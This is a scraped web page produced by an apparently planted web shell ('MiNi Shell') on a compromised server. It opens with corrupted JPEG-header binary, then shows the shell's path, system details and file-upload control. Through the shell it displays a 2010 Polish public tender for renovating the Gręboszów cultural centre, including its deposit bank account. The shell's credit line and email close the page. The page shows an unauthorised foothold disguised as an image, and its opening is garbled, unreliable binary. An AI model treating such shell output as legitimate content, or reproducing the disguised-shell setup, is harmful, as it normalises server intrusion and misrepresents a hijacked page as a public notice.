JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100205/34008-N-2010.html

<p class="kh_header"><b>Gręboszów: Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie wraz z zagospodarowaniem terenu centrum Gręboszowa</b><br>
<b>Numer ogłoszenia: 34008 - 2010; data zamieszczenia: 05.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie wraz z zagospodarowaniem terenu centrum Gręboszowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w  Gręboszowie wraz z zagospodarowaniem terenu centrum Gręboszowa  2.  Zakres zamówienia obejmuje wykonanie następujących elementów: 2.1  Remont i wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie usytuowanego  na działce nr 599, pow. zabudowy 10,00x18,00 =180,00 m2, pow. użytkowa  161,78 m2, kubatura  882,00 m3, 
2.1.1 Roboty budowlane; 1) Roboty rozbiórkowe i demontażowe, 2) Stolarka okienna, 3) Elewacje z ociepleniem budynku, 4) Okładziny ścian wewnętrznych i sufitów, 5) Roboty posadzkarskie, 6) Wykonanie postumentu pod scenę, 7) Roboty malarskie, 8) Instalacja wentylacyjna i spalinowa, 9) Stolarka drzwiowa, 10) Instalacja centralnego ogrzewania, 11) Instalacja wodociągowa i kanalizacyjna, 
12) Instalacja gazowa,13) Instalacja kanalizacyjna zewnętrzna, 14) Instalacja elektryczna
2.1.2 Wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie, 1)projektor multimedialny 1 kpl, 2)	ekran projekcyjny1 kpl,
3)sprzęt nagłośnieniowy 1 kpl, 4) laptop multimedialny 1 kpl
2.2 Budowa i wyposażenie małej architektury, 2.2.1   Stylowa wiata przystankowa na działce  nr 361 w Gręboszowie, pow. zabudowy 19,63 m2, pow. użytkowa 15,89 m2, kubatura 71,65 m3,
2.2.2 Wyposażenie małej architektury;1)stylowa tablica informacyjna turystyczna  1 kpl, 2)	stylowa latarnia parkowa solarna 8 szt, 3)stylowe kosze na śmieci                              6 szt,4)	stylowe ławki ogrodowe 9 szt
2.3	Zagospodarowanie terenu centrum Gręboszowa   
2.3.2	 Place, parkingi, chodniki   1712,09  m2 (dz. nr 599,361,846/2, 362)
2.3.3	 Odwodnienie placów, parkingów, chodników (dz. nr 599, 846/2,  584, 361, 362, 398)
2.3.4	 Plac dojazdowy do garażu OSP 131,75 m2 (dz. nr 362).

                    2.4    Urządzanie i porządkowanie terenów zielonych 
2.4.1 Roboty w zakresie porządkowania terenów zielonych 
         1) Oczyszczenie terenu z resztek budowlanych gruzu i śmieci 195,60 m2
         2) Rozścielenie ziemi urodzajnej 204,62 m2
         3) Sadzenie drzew i krzewów iglastych 124 szt.
         4) Wykonanie trawników 115 m2
         5) Obsadzenie kwietników 114 m2

3.  Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku  do SIWZ nr 9 (projekt budowlany).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.20.00.00-9, 45.11.12.91-4, 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.     Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 30 000,00 zł, słownie:trzydzieści tysięcy  złotych, które winno być wniesione  przed upływem terminu składania ofert. 
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
   3    Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto 
          Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział 
          Gręboszów z dopiskiem Wadium do przetargu - Odnowa Centrum Gręboszowa .  
   4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
           Za termin  wniesienia wadium uznaje się datę wpływu na  rachunek   zamawiającego. Wadium 
           pieniężne musi być  zaksięgowane najpóźniej dzień przed upływem terminu składania ofert, dlatego 
           Wykonawca musi uwzględnić czas, aby wymagana kwota  zdążyła wpłynąć na konto Zamawiającego 
           (została zaksięgowana w banku na rzecz Zamawiającego).  

     5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany 
           jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed 
           upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat, 
           a do  oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
           Wykonawcę.  Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty 
           składania ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej 
           treści na przepis   art. 46 ust. 5 Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne 
           żądanie Zamawiającego.  
     6.   Wykonawca, który wniesie wadium w innej, niż wyżej wskazanej formie, jego oferta nie będzie 
           zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć go z postępowania na podstawie art. 24 
           ust.2 pkt 4 ustawy.
 7.    Wadium wniesione w pieniądzu  Zamawiający przechowuje na rachunku bankowym, które zwraca  wraz 
        z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
        pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy
       na rachunek bankowy wskazany przez wykonawcę.
 8.   Zwrot wadium;
       1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty 
           najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została 
           wybrana jako najkorzystniejsza,
       2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium 
            niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia 
            należytego wykonania umowy, jeżeli jego wniesienie żądano,
       3) Zamawiający zwraca  niezwłocznie wadium, na wniosek  Wykonawcy, który wycofał ofertę przed 
            upływem terminu składania ofert.
    9.   Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium 
            na podstawie  ust. 8 pkt 1, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została 
            wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
  10.    Zatrzymanie wadium;
       1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, 
            o którym mowa w art. 26 ust. 3ustawy Pzp, nie złożył dokumentów lub oświadczeń, o którym mowa 
            w art. 25 ust.1ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących 
            po jego stronie. 
2)	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
               a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
         b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
               c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
                   po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć: wykaz wykonanych robót budowlanych (sporządzony wg wzoru stanowiącego załącznik nr 4 do  SIWZ) w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania, a jeżeli okres  prowadzenia działalności  jest krótszy w tym okresie, z podaniem ich  rodzaju  i wartości, daty i miejsca wykonania oraz ałączeniem dokumentu potwierdzającego, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca winien  wykazać, że  wykonał  tym okresie,  co najmniej   2 zamówienia,  i każde odpowiadające swoim rodzajem   i minimum  wartością  robotom  budowlanym stanowiącym   przedmiot zamówienia, tj; budowa, przebudowa, remont budynków  wraz z zagospodarowaniem terenu  wokół budynków oraz, że zostały one wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  potwierdzone protokołami  odbioru i referencjami lub dokumentami równoważnymi.
Ocena spełnienia niniejszego warunku dokonana zostanie zgodnie z formułą, spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć:  wykaz osób,  które  będą uczestniczyć w wykonaniu  zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami  na temat ich kwalifikacji,zawodowych,    doświadczenia   i wykształcenia niezbędnych do wykonania  zamówienia, a także zakresu wykonywanych przez nie  czynności, oraz informacjami  o podstawie dysponowania tymi osobami sporządzonego (według wzoru stanowiącego  załącznik nr 5 do  SIWZ). Zamawiający wymaga aby Wykonawca dysponował następującymi osobami  zdolnymi  do wykonania  zamówienia:a) kierownik budowy - osoba posiadająca uprawnienia do pełnienia  samodzielnych funkcji technicznych w budownictwie minimum w specjalności konstrukcyjno  budowlanej (lub 
odpowiadające  im równoważne uprawnienia budowlane)  w zakresie kierowania robotami budowlanymi stanowiącymi przedmiot zamówienia z przynależnością do właściwej izby samorządu zawodowego,b) kierownik robót elektrycznych - osoba posiadająca uprawnienia do pełnienia  samodzielnych funkcji  technicznych w budownictwie w specjalności instalacyjnej w zakresie instalacji i urządzeń 
elektrycznych  (lub odpowiadające  im równoważne uprawnienia budowlane)  w zakresie kierowania robotami elektrycznymi  stanowiącymi przedmiot zamówienia z przynależnością do właściwej izby samorządu  zawodowego, c) kierownik robót instalacyjnych - osoba posiadająca uprawnienia do pełnienia  samodzielnych funkcji  technicznych w budownictwie w specjalności  instalacyjnej  w zakresie  instalacji  i urządzeń; wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych (lub odpowiadające   równoważne uprawnienia budowlane)  w zakresie kierowania robotami instalacyjnymi stanowiącymi przedmiot zamówienia z przynależnością do właściwej izby samorządu  zawodowego.Należy załączyć odpisy  odpowiednich uprawnień budowlanych umożliwiających  sprawowanie funkcji  kierownika budowy, robót oraz  aktualne zaświadczenia o przynależności jego do samorządu  zawodowego  inne porównywalne dokumenty.  
Ocena spełnienia niniejszego warunku dokonana zostanie zgodnie z formułą, spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć: 1) Oświadczenie o sytuacji finansowej wykonawcy (sporządzone według wzoru stanowiącego załącznik nr 7 do SIWZ,
aktualne ubezpieczenie  od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż przedmiot zamówienia. 2) Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej w których Wykonawca posiada rachunek, potwierdzająca dysponowanie środkami finansowymi lub zdolnością kredytową w kwocie minimum 30 % wartości wykonania przedmiotu zamówienia, wystawioną nie wcześniej 
 niż 1 miesiąc przed upływem terminu składania ofert lub inny porównywalny dokument, który potwierdzi, że Wykonawca  dysponuje  środkami finansowymi w wymaganej kwocie na wykonanie niniejszego przedmiotu zamówienia.
Ocena spełnienia niniejszego warunku dokonana zostanie zgodnie z formułą, spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	Zmiana terminu realizacji przedmiotu umowy;
a) zmiany spowodowane warunkami atmosferycznymi, w szczególności; klęski żywiołowe, 
    warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie 
    prób i sprawdzeń, dokonywanie odbiorów,
             b) zmiany będące następstwem okoliczności leżących po stronie zamawiającego,
                 w szczególności; wstrzymanie robót przez zamawiającego,
             c) inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące 
                 niemożliwością prowadzenia prac.
             W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania
             umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania 
             jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.
2)	Zmiana sposobu spełniania świadczenia;
a) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań 
    technicznych lub materiałowych  niż  wskazane w dokumentacji projektowej w sytuacji, gdyby 
    zastosowanie  przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem 
    przedmiotu  umowy lub ze względu na zmiany obowiązującego prawa.
    Zmiana ta będzie wprowadzona wyłącznie w zakresie umożliwiającym oddanie przedmiotu 
    umowy do użytkowania, a zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia 
    z tytułu takich zmian.
b) roboty zamienne będą wykonywane przy zachowaniu nie pogorszonych norm, standardów
    i parametrów.        
3)	Zmiany osobowe;
a) Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne 
     legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa 
     w ustawie Prawo budowlane lub innych ustawach, 
b)  Zmiana podwykonawców,
4)	c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl BIP Małopolska gmina Gręboszów<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 2 (parter) lub za posrednictwem pocztowym, po uprzednim złożeniu wniosku nie później niż 6 dni przed terminem otwarcia ofert.Cena 200zł+22% VAT..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2010 godzina 09:00, miejsce: Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 11 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach programu -Program Rozwoju Obszarow Wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com